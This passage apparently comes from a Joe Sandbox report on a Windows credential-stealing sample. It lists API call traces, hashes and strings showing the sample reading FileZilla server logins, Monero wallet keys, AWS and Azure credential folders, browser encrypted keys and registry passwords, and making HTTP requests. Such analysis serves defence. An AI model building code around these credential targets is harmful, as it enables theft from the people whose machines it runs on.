                                • lstrcat.KERNEL32(?,00EE169C), ref: 00ED0635
                                • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00EE0DB2), ref: 00ED068E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                 • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                                • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                • API String ID: 1942843190-555421843
                                • Opcode ID: 5956b814e231a8a35845101a060fdd90071be2d03ba3e98bb089f6bc737acd9d
                                • Instruction ID: 6f15bd4fe41e905068fb3c2150b2d5b7965ee2d09dd562d3291648fdf4d841d7
                                • Opcode Fuzzy Hash: 5956b814e231a8a35845101a060fdd90071be2d03ba3e98bb089f6bc737acd9d
                                • Instruction Fuzzy Hash: 2DD14F76D002089BCB08EBF0DD9AEEE7778EF14300F44552AF512B7185EE74AA46DB61
                                APIs
                                  • Part of subcall function 00EDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EDA7E6
                                  • Part of subcall function 00EC47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00EC4839
                                  • Part of subcall function 00EC47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00EC4849
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00EC59F8
                                • StrCmpCA.SHLWAPI(?,01B8E220), ref: 00EC5A13
                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00EC5B93
                                • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,01B8E3C0,00000000,?,01B89B58,00000000,?,00EE1A1C), ref: 00EC5E71
                                • lstrlen.KERNEL32(00000000), ref: 00EC5E82
                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00EC5E93
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00EC5E9A
                                • lstrlen.KERNEL32(00000000), ref: 00EC5EAF
                                • lstrlen.KERNEL32(00000000), ref: 00EC5ED8
                                • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00EC5EF1
                                • lstrlen.KERNEL32(00000000,?,?), ref: 00EC5F1B
                                • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00EC5F2F
                                • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00EC5F4C
                                • InternetCloseHandle.WININET(00000000), ref: 00EC5FB0
                                • InternetCloseHandle.WININET(00000000), ref: 00EC5FBD
                                • HttpOpenRequestA.WININET(00000000,01B8E250,?,01B8DA10,00000000,00000000,00400100,00000000), ref: 00EC5BF8
                                  • Part of subcall function 00EDA9B0: lstrlen.KERNEL32(?,01B88950,?,\Monero\wallet.keys,00EE0E17), ref: 00EDA9C5
                                  • Part of subcall function 00EDA9B0: lstrcpy.KERNEL32(00000000), ref: 00EDAA04
                                  • Part of subcall function 00EDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EDAA12
                                  • Part of subcall function 00EDA8A0: lstrcpy.KERNEL32(?,00EE0E17), ref: 00EDA905
                                  • Part of subcall function 00EDA920: lstrcpy.KERNEL32(00000000,?), ref: 00EDA972
                                  • Part of subcall function 00EDA920: lstrcat.KERNEL32(00000000), ref: 00EDA982
                                • InternetCloseHandle.WININET(00000000), ref: 00EC5FC7
                                Strings
                                Yara matches
                                Similarity
                                • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                                • String ID: "$"$------$------$------
                                • API String ID: 874700897-2180234286
                                • Opcode ID: 6ec59c9878d46a683d937cad0768e18457f25b8c4def870929306379e23668a5
                                • Instruction ID: b2e44ec00474f375440ad1df2e1bc411259c2e6df8b3870dae52860e677b4bb3
                                • Opcode Fuzzy Hash: 6ec59c9878d46a683d937cad0768e18457f25b8c4def870929306379e23668a5
                                • Instruction Fuzzy Hash: 65122176820118AACB19EBA0DC95FEE73B8FF54700F4451BAB50672191EF702B8ACF55
                                APIs
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                  • Part of subcall function 00EDA9B0: lstrlen.KERNEL32(?,01B88950,?,\Monero\wallet.keys,00EE0E17), ref: 00EDA9C5
                                  • Part of subcall function 00EDA9B0: lstrcpy.KERNEL32(00000000), ref: 00EDAA04
                                  • Part of subcall function 00EDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EDAA12
                                  • Part of subcall function 00EDA8A0: lstrcpy.KERNEL32(?,00EE0E17), ref: 00EDA905
                                  • Part of subcall function 00ED8B60: GetSystemTime.KERNEL32(00EE0E1A,01B89EE8,00EE05AE,?,?,00EC13F9,?,0000001A,00EE0E1A,00000000,?,01B88950,?,\Monero\wallet.keys,00EE0E17), ref: 00ED8B86
                                  • Part of subcall function 00EDA920: lstrcpy.KERNEL32(00000000,?), ref: 00EDA972
                                  • Part of subcall function 00EDA920: lstrcat.KERNEL32(00000000), ref: 00EDA982
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00ECCF83
                                • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00ECD0C7
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00ECD0CE
                                • lstrcat.KERNEL32(?,00000000), ref: 00ECD208
                                • lstrcat.KERNEL32(?,00EE1478), ref: 00ECD217
                                • lstrcat.KERNEL32(?,00000000), ref: 00ECD22A
                                • lstrcat.KERNEL32(?,00EE147C), ref: 00ECD239
                                • lstrcat.KERNEL32(?,00000000), ref: 00ECD24C
                                • lstrcat.KERNEL32(?,00EE1480), ref: 00ECD25B
                                • lstrcat.KERNEL32(?,00000000), ref: 00ECD26E
                                • lstrcat.KERNEL32(?,00EE1484), ref: 00ECD27D
                                • lstrcat.KERNEL32(?,00000000), ref: 00ECD290
                                • lstrcat.KERNEL32(?,00EE1488), ref: 00ECD29F
                                • lstrcat.KERNEL32(?,00000000), ref: 00ECD2B2
                                • lstrcat.KERNEL32(?,00EE148C), ref: 00ECD2C1
                                • lstrcat.KERNEL32(?,00000000), ref: 00ECD2D4
                                • lstrcat.KERNEL32(?,00EE1490), ref: 00ECD2E3
                                  • Part of subcall function 00EDA820: lstrlen.KERNEL32(00EC4F05,?,?,00EC4F05,00EE0DDE), ref: 00EDA82B
                                  • Part of subcall function 00EDA820: lstrcpy.KERNEL32(00EE0DDE,00000000), ref: 00EDA885
                                • lstrlen.KERNEL32(?), ref: 00ECD32A
                                • lstrlen.KERNEL32(?), ref: 00ECD339
                                  • Part of subcall function 00EDAA70: StrCmpCA.SHLWAPI(01B88A70,00ECA7A7,?,00ECA7A7,01B88A70), ref: 00EDAA8F
                                • DeleteFileA.KERNEL32(00000000), ref: 00ECD3B4
                                Yara matches
                                Similarity
                                • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                • String ID:
                                • API String ID: 1956182324-0
                                • Opcode ID: 8fa6de29405962520765938ff27f8888cb4e2910720ea31b25f8262cef8bcf72
                                • Instruction ID: e72d1d2502e7280ec9fe85a82053a8928d4ab368b62ca497302f51b1ac162d5c
                                • Opcode Fuzzy Hash: 8fa6de29405962520765938ff27f8888cb4e2910720ea31b25f8262cef8bcf72
                                • Instruction Fuzzy Hash: 84E171728002089BCB19EBA0ED96EEE73B8FF14301F04517AF516B3181DE75AB46DB61
                                APIs
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                  • Part of subcall function 00EDA920: lstrcpy.KERNEL32(00000000,?), ref: 00EDA972
                                  • Part of subcall function 00EDA920: lstrcat.KERNEL32(00000000), ref: 00EDA982
                                  • Part of subcall function 00EDA8A0: lstrcpy.KERNEL32(?,00EE0E17), ref: 00EDA905
                                  • Part of subcall function 00EDA9B0: lstrlen.KERNEL32(?,01B88950,?,\Monero\wallet.keys,00EE0E17), ref: 00EDA9C5
                                  • Part of subcall function 00EDA9B0: lstrcpy.KERNEL32(00000000), ref: 00EDAA04
                                  • Part of subcall function 00EDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EDAA12
                                • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,01B8CEC8,00000000,?,00EE144C,00000000,?,?), ref: 00ECCA6C
                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00ECCA89
                                • GetFileSize.KERNEL32(00000000,00000000), ref: 00ECCA95
                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00ECCAA8
                                • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00ECCAD9
                                • StrStrA.SHLWAPI(?,01B8CE38,00EE0B52), ref: 00ECCAF7
                                • StrStrA.SHLWAPI(00000000,01B8CDF0), ref: 00ECCB1E
                                • StrStrA.SHLWAPI(?,01B8D358,00000000,?,00EE1458,00000000,?,00000000,00000000,?,01B88A00,00000000,?,00EE1454,00000000,?), ref: 00ECCCA2
                                • StrStrA.SHLWAPI(00000000,01B8D298), ref: 00ECCCB9
                                  • Part of subcall function 00ECC820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00ECC871
                                  • Part of subcall function 00ECC820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00ECC87C
                                • StrStrA.SHLWAPI(?,01B8D298,00000000,?,00EE145C,00000000,?,00000000,01B88A50), ref: 00ECCD5A
                                • StrStrA.SHLWAPI(00000000,01B888C0), ref: 00ECCD71
                                  • Part of subcall function 00ECC820: lstrcat.KERNEL32(?,00EE0B46), ref: 00ECC943
                                  • Part of subcall function 00ECC820: lstrcat.KERNEL32(?,00EE0B47), ref: 00ECC957
                                  • Part of subcall function 00ECC820: lstrcat.KERNEL32(?,00EE0B4E), ref: 00ECC978
                                • lstrlen.KERNEL32(00000000), ref: 00ECCE44
                                • CloseHandle.KERNEL32(00000000), ref: 00ECCE9C
                                Strings
                                Yara matches
                                Similarity
                                • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                                • String ID:
                                • API String ID: 3744635739-3916222277
                                • Opcode ID: 7bd2a4d16efea06eba6c3a45751f744eba5190e7071d4b5181cf9ff292e4c1bf
                                • Instruction ID: cd05114e574cbd3458036e470b5596fc997e9941d6268d8b00a88f313cbd014b
                                • Opcode Fuzzy Hash: 7bd2a4d16efea06eba6c3a45751f744eba5190e7071d4b5181cf9ff292e4c1bf
                                • Instruction Fuzzy Hash: 84E10C76800148AACB19EBA0DC95FEE77B8EF54300F44516AF50673291DE706B8BCB65
                                APIs
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                • RegOpenKeyExA.ADVAPI32(00000000,01B8AEC0,00000000,00020019,00000000,00EE05B6), ref: 00ED83A4
                                • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00ED8426
                                • wsprintfA.USER32 ref: 00ED8459
                                • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00ED847B
                                • RegCloseKey.ADVAPI32(00000000), ref: 00ED848C
                                • RegCloseKey.ADVAPI32(00000000), ref: 00ED8499
                                  • Part of subcall function 00EDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EDA7E6
                                Strings
                                Yara matches
                                Similarity
                                • API ID: CloseOpenlstrcpy$Enumwsprintf
                                • String ID: - $%s\%s$?
                                • API String ID: 3246050789-3278919252
                                • Opcode ID: e750ccd1c1aab1bb93e721dc1c5e55d744765a13c98ff12fe24093aa089ebaba
                                • Instruction ID: 5431431c43f89785cadc67b314f2dbcd9b8f9b1cf9b0500426d2e143c2dff626
                                • Opcode Fuzzy Hash: e750ccd1c1aab1bb93e721dc1c5e55d744765a13c98ff12fe24093aa089ebaba
                                • Instruction Fuzzy Hash: 26811E719102189BDB29DF50DD95FEA77B8FF48700F0092AAE509A6240DF716B86CF94
                                APIs
                                  • Part of subcall function 00ED8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00ED8E0B
                                • lstrcat.KERNEL32(?,00000000), ref: 00ED4DB0
                                • lstrcat.KERNEL32(?,\.azure\), ref: 00ED4DCD
                                  • Part of subcall function 00ED4910: wsprintfA.USER32 ref: 00ED492C
                                  • Part of subcall function 00ED4910: FindFirstFileA.KERNEL32(?,?), ref: 00ED4943
                                • lstrcat.KERNEL32(?,00000000), ref: 00ED4E3C
                                • lstrcat.KERNEL32(?,\.aws\), ref: 00ED4E59
                                  • Part of subcall function 00ED4910: StrCmpCA.SHLWAPI(?,00EE0FDC), ref: 00ED4971
                                  • Part of subcall function 00ED4910: StrCmpCA.SHLWAPI(?,00EE0FE0), ref: 00ED4987
                                  • Part of subcall function 00ED4910: FindNextFileA.KERNEL32(000000FF,?), ref: 00ED4B7D
                                  • Part of subcall function 00ED4910: FindClose.KERNEL32(000000FF), ref: 00ED4B92
                                • lstrcat.KERNEL32(?,00000000), ref: 00ED4EC8
                                • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00ED4EE5
                                  • Part of subcall function 00ED4910: wsprintfA.USER32 ref: 00ED49B0
                                  • Part of subcall function 00ED4910: StrCmpCA.SHLWAPI(?,00EE08D2), ref: 00ED49C5
                                  • Part of subcall function 00ED4910: wsprintfA.USER32 ref: 00ED49E2
                                  • Part of subcall function 00ED4910: PathMatchSpecA.SHLWAPI(?,?), ref: 00ED4A1E
                                  • Part of subcall function 00ED4910: lstrcat.KERNEL32(?,01B8E360), ref: 00ED4A4A
                                  • Part of subcall function 00ED4910: lstrcat.KERNEL32(?,00EE0FF8), ref: 00ED4A5C
                                  • Part of subcall function 00ED4910: lstrcat.KERNEL32(?,?), ref: 00ED4A70
                                  • Part of subcall function 00ED4910: lstrcat.KERNEL32(?,00EE0FFC), ref: 00ED4A82
                                  • Part of subcall function 00ED4910: lstrcat.KERNEL32(?,?), ref: 00ED4A96
                                  • Part of subcall function 00ED4910: CopyFileA.KERNEL32(?,?,00000001), ref: 00ED4AAC
                                  • Part of subcall function 00ED4910: DeleteFileA.KERNEL32(?), ref: 00ED4B31
                                Strings
                                Yara matches
                                Similarity
                                • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                • API String ID: 949356159-974132213
                                • Opcode ID: 97810b2c89f941123e0978de14277f2ce1df51b6d9bfc7cdd1d93d46e53bac75
                                • Instruction ID: 4ce3c7f2187fcee8ae73bc33c97e893502b27c455addbcdd9f04cccda05a62cd
                                • Opcode Fuzzy Hash: 97810b2c89f941123e0978de14277f2ce1df51b6d9bfc7cdd1d93d46e53bac75
                                • Instruction Fuzzy Hash: 6C41D6BA94030867CB14F770EC47FED3378AB60700F0055A57289721C1EDB59BCA8B92
                                APIs
                                • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00ED906C
                                Similarity
                                • API ID: CreateGlobalStream
                                • String ID: image/jpeg
                                • API String ID: 2244384528-3785015651
                                • Opcode ID: 537c281c599cc3a510d2f74254b06b812795a81b0334b68c2407327a6d2df57d
                                • Instruction ID: fed37d08e9ca6a097c4e21ee18005ed1984b36c4592e905516235c0edcd39c0e
                                • Opcode Fuzzy Hash: 537c281c599cc3a510d2f74254b06b812795a81b0334b68c2407327a6d2df57d
                                • Instruction Fuzzy Hash: 3771ED75D10208ABDB18DBE4ED89FEEB7B8FF48300F108519F516A7284DB75A945CB60
                                APIs
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                • ShellExecuteEx.SHELL32(0000003C), ref: 00ED31C5
                                • ShellExecuteEx.SHELL32(0000003C), ref: 00ED335D
                                • ShellExecuteEx.SHELL32(0000003C), ref: 00ED34EA
                                Similarity
                                • API ID: ExecuteShell$lstrcpy
                                • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                • API String ID: 2507796910-3625054190
                                • Opcode ID: 3260ee8560272c4d04b0f4f6fedf932b5d03413cedf8dd4b264bb3c11562aff3
                                • Instruction ID: ec3daabb3cc6a394333b299ec62dc525e10d136d909461e1f71274cbc2a073a9
                                • Opcode Fuzzy Hash: 3260ee8560272c4d04b0f4f6fedf932b5d03413cedf8dd4b264bb3c11562aff3
                                • Instruction Fuzzy Hash: 66123E768001089ADB19EBA0DD96FEDB7B8EF54300F44516AF50676291EF702B4BCF62
                                APIs
                                  • Part of subcall function 00EDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EDA7E6
                                  • Part of subcall function 00EC6280: InternetOpenA.WININET(00EE0DFE,00000001,00000000,00000000,00000000), ref: 00EC62E1
                                  • Part of subcall function 00EC6280: StrCmpCA.SHLWAPI(?,01B8E220), ref: 00EC6303
                                  • Part of subcall function 00EC6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00EC6335
                                  • Part of subcall function 00EC6280: HttpOpenRequestA.WININET(00000000,GET,?,01B8DA10,00000000,00000000,00400100,00000000), ref: 00EC6385
                                  • Part of subcall function 00EC6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00EC63BF
                                  • Part of subcall function 00EC6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00EC63D1
                                  • Part of subcall function 00EDA8A0: lstrcpy.KERNEL32(?,00EE0E17), ref: 00EDA905
                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00ED5318
                                • lstrlen.KERNEL32(00000000), ref: 00ED532F
                                  • Part of subcall function 00ED8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00ED8E52
                                • StrStrA.SHLWAPI(00000000,00000000), ref: 00ED5364
                                • lstrlen.KERNEL32(00000000), ref: 00ED5383
                                • lstrlen.KERNEL32(00000000), ref: 00ED53AE
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                Similarity
                                • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                                • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                • API String ID: 3240024479-1526165396
                                • Opcode ID: 6003f5154008f1a1d9abce5da5bedc0c847510fcf0cf34bf28f48ae86f731101
                                • Instruction ID: c969cae39c75680c89c285a39789b514df2aa7cc9976e1518805f19083ef298f
                                • Opcode Fuzzy Hash: 6003f5154008f1a1d9abce5da5bedc0c847510fcf0cf34bf28f48ae86f731101
                                • Instruction Fuzzy Hash: 8A511B359101489BCB18FF64D996AED77B9EF10300F54602AF8067A292EF346B47DB62
                                Similarity
                                • API ID: lstrcpylstrlen
                                • String ID:
                                • API String ID: 2001356338-0
                                • Opcode ID: dff6ca99cc3e0670e132e871b64810bef6445bde43fc8f48c0b63c93ef4db250
                                • Instruction ID: c28c2c242354d2b73cd32626e9f9e6216c092ce3da464a4e985d07e1f8de68a7
                                • Opcode Fuzzy Hash: dff6ca99cc3e0670e132e871b64810bef6445bde43fc8f48c0b63c93ef4db250
                                • Instruction Fuzzy Hash: EAC196B5D002199BCB18EF60DC89FDA73B8FF54304F0455AAF50A77241EA70AA86CF91
                                APIs
                                  • Part of subcall function 00ED8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00ED8E0B
                                • lstrcat.KERNEL32(?,00000000), ref: 00ED42EC
                                • lstrcat.KERNEL32(?,01B8DE30), ref: 00ED430B
                                • lstrcat.KERNEL32(?,?), ref: 00ED431F
                                • lstrcat.KERNEL32(?,01B8CE98), ref: 00ED4333
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                  • Part of subcall function 00ED8D90: GetFileAttributesA.KERNEL32(00000000,?,00EC1B54,?,?,00EE564C,?,?,00EE0E1F), ref: 00ED8D9F
                                  • Part of subcall function 00EC9CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00EC9D39
                                  • Part of subcall function 00EC99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00EC99EC
                                  • Part of subcall function 00EC99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00EC9A11
                                  • Part of subcall function 00EC99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00EC9A31
                                  • Part of subcall function 00EC99C0: ReadFile.KERNEL32(000000FF,?,00000000,00EC148F,00000000), ref: 00EC9A5A
                                  • Part of subcall function 00EC99C0: LocalFree.KERNEL32(00EC148F), ref: 00EC9A90
                                  • Part of subcall function 00EC99C0: CloseHandle.KERNEL32(000000FF), ref: 00EC9A9A
                                  • Part of subcall function 00ED93C0: GlobalAlloc.KERNEL32(00000000,00ED43DD,00ED43DD), ref: 00ED93D3
                                • StrStrA.SHLWAPI(?,01B8DFB0), ref: 00ED43F3
                                • GlobalFree.KERNEL32(?), ref: 00ED4512
                                  • Part of subcall function 00EC9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 00EC9AEF
                                  • Part of subcall function 00EC9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00EC4EEE,00000000,?), ref: 00EC9B01
                                  • Part of subcall function 00EC9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 00EC9B2A
                                  • Part of subcall function 00EC9AC0: LocalFree.KERNEL32(?,?,?,?,00EC4EEE,00000000,?), ref: 00EC9B3F
                                • lstrcat.KERNEL32(?,00000000), ref: 00ED44A3
                                • StrCmpCA.SHLWAPI(?,00EE08D1), ref: 00ED44C0
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00ED44D2
                                • lstrcat.KERNEL32(00000000,?), ref: 00ED44E5
                                • lstrcat.KERNEL32(00000000,00EE0FB8), ref: 00ED44F4
                                Similarity
                                • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                • String ID:
                                • API String ID: 3541710228-0
                                • Opcode ID: cf1e56eff342d55e324d03721c3bdc29789550e02413e674e95a6deb4d111f09
                                • Instruction ID: 5cccb715076cd7db99bd43f69d829d861c5fe5c9acf127878e033eb582657fcc
                                • Opcode Fuzzy Hash: cf1e56eff342d55e324d03721c3bdc29789550e02413e674e95a6deb4d111f09
                                • Instruction Fuzzy Hash: 5F7177B6D00208ABCB14EBB0EC89FED73B9BF48300F045599F615A7181DA75DB56CB91
                                APIs
                                  • Part of subcall function 00EC12A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00EC12B4
                                  • Part of subcall function 00EC12A0: RtlAllocateHeap.NTDLL(00000000), ref: 00EC12BB
                                  • Part of subcall function 00EC12A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00EC12D7
                                  • Part of subcall function 00EC12A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00EC12F5
                                  • Part of subcall function 00EC12A0: RegCloseKey.ADVAPI32(?), ref: 00EC12FF
                                • lstrcat.KERNEL32(?,00000000), ref: 00EC134F
                                • lstrlen.KERNEL32(?), ref: 00EC135C
                                • lstrcat.KERNEL32(?,.keys), ref: 00EC1377
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                  • Part of subcall function 00EDA9B0: lstrlen.KERNEL32(?,01B88950,?,\Monero\wallet.keys,00EE0E17), ref: 00EDA9C5
                                  • Part of subcall function 00EDA9B0: lstrcpy.KERNEL32(00000000), ref: 00EDAA04
                                  • Part of subcall function 00EDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EDAA12
                                  • Part of subcall function 00EDA8A0: lstrcpy.KERNEL32(?,00EE0E17), ref: 00EDA905
                                  • Part of subcall function 00ED8B60: GetSystemTime.KERNEL32(00EE0E1A,01B89EE8,00EE05AE,?,?,00EC13F9,?,0000001A,00EE0E1A,00000000,?,01B88950,?,\Monero\wallet.keys,00EE0E17), ref: 00ED8B86
                                  • Part of subcall function 00EDA920: lstrcpy.KERNEL32(00000000,?), ref: 00EDA972
                                  • Part of subcall function 00EDA920: lstrcat.KERNEL32(00000000), ref: 00EDA982
                                • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00EC1465
                                  • Part of subcall function 00EDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EDA7E6
                                  • Part of subcall function 00EC99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00EC99EC
                                  • Part of subcall function 00EC99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00EC9A11
                                  • Part of subcall function 00EC99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00EC9A31
                                  • Part of subcall function 00EC99C0: ReadFile.KERNEL32(000000FF,?,00000000,00EC148F,00000000), ref: 00EC9A5A
                                  • Part of subcall function 00EC99C0: LocalFree.KERNEL32(00EC148F), ref: 00EC9A90
                                  • Part of subcall function 00EC99C0: CloseHandle.KERNEL32(000000FF), ref: 00EC9A9A
                                • DeleteFileA.KERNEL32(00000000), ref: 00EC14EF
                                Similarity
                                • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                • API String ID: 3478931302-218353709
                                • Opcode ID: 7faa12a9254d663e1f645a30e8d1a2a50ed5d55c0b9a2e20a07030a375ab6b4f
                                • Instruction ID: 3585d613e17d6b6ecd3428e59d604512a235b6ea4fd77d1bfc87a39d7ad8db8d
                                • Opcode Fuzzy Hash: 7faa12a9254d663e1f645a30e8d1a2a50ed5d55c0b9a2e20a07030a375ab6b4f
                                • Instruction Fuzzy Hash: 245174B2D102185BCB19EB60DD96FED73BCEF50300F4451B9B60A72182EE705B86CBA5
                                APIs
                                  • Part of subcall function 00EC72D0: memset.MSVCRT ref: 00EC7314
                                  • Part of subcall function 00EC72D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00EC733A
                                  • Part of subcall function 00EC72D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00EC73B1
                                  • Part of subcall function 00EC72D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00EC740D
                                  • Part of subcall function 00EC72D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00EC7452
                                  • Part of subcall function 00EC72D0: HeapFree.KERNEL32(00000000), ref: 00EC7459
                                • lstrcat.KERNEL32(00000000,00EE17FC), ref: 00EC7606
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00EC7648
                                • lstrcat.KERNEL32(00000000, : ), ref: 00EC765A
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00EC768F
                                • lstrcat.KERNEL32(00000000,00EE1804), ref: 00EC76A0
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00EC76D3
                                • lstrcat.KERNEL32(00000000,00EE1808), ref: 00EC76ED
                                • task.LIBCPMTD ref: 00EC76FB
                                Similarity
                                • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                                • String ID: :
                                • API String ID: 3191641157-3653984579
                                • Opcode ID: eeecbfa1ad6ce0bc3e6a2ce0ce79fcc8621b33ca385e0dce6960fc7f4998a2d0
                                • Instruction ID: c0a799a38b44c012a6b0c8bd4e4b53906d9b268a07007b2f52af7c2a423af6fe
